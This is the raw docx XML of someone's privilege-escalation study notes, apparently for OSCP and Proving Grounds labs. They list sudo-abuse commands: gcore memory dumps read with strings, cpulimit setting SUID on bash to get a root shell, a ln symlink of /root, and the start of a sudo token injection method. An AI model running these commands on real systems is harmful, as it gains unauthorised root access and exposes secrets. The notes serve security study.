      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">493</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002017">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo gcore &lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002018">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings core.&lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002019">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These commands were from </w:t>
      </w:r>
      <w:hyperlink r:id="rId695">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup and matched the instructions from GTFObins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201A">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here is another way to dump and read:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -u root /usr/bin/gcore -a -o &lt;outputfile&gt; &lt;pid&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1462"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">strings &lt;outputfile&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="974"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The commands were from </w:t>
      </w:r>
      <w:hyperlink r:id="rId696">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">this</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> writeup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000201F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002020">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002021">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7i529t39a1bs" w:id="279"/>
      <w:bookmarkEnd w:id="279"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/cpulimit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002022">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1365"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId697">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">OnSystemShellDredd</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play, we saw /usr/bin/cpulimit with sudo privileges</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002023">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1365"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used a sequence of commands much different than GTFO Bins</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002024">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1365"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cpulimit -l 100 -f chmod +s bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002025">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1365"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002026">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002027">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4lw0b5ouox0r" w:id="280"/>
      <w:bookmarkEnd w:id="280"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/ln</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002028">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId698">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Seppuku</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002029">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Had one user with "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(ALL) NOPASSWD: /usr/bin/ln -sf /root/ /tmp/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/ln creates symbolic links</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This command creates a symbolic link (-s) forcibly (-f) from /root/ to /tmp/. In other words, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/root will become a symlink to /root</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So running this command will create a directory /root inside of /tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this led to nowhere, but it was cool to learn about</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /usr/bin/ln</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="259"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Had another interesting attack vector with having to use multiple users on the same machine in order to exploit the command in sudo -l. It had to do with /.cgi-bin/bin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000202F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002030">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002031">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/bin/crontab -l, /usr/sbin/tcpdump, /usr/bin/apt-get</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002032">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">These 3 were seen in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 18.4.2. Abusing Sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002033">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002034">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So if you see any of these, look at that section for how to abuse them</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002035">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000020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37">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002038">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gwi0wf5w0t0a" w:id="281"/>
      <w:bookmarkEnd w:id="281"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo Token Inject</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002039">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203A">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Have yet to actually see this. It was in Powall's checklist</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId699">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/nongiach/sudo_inject</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploits in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">~/Downloads/sudo-token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000203F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002040">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You know how when you run "sudo -l" and then you type in your password, and then you do "sudo -l" again (or any sudo command) and it doesn't prompt you for password? It remembers that you are able to do sudo? Well, we can abuse this by taking that sudo token and using it to priv esc.</w:t>
      </w:r>
    </w:p>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check requirements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /proc/sys/kernel/yama/ptrace_scope</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If output is "0" then it might be vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Try running sudo to trigger a token</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002046">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="369"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo id</w:t>
      </w:r>
    </w:p>
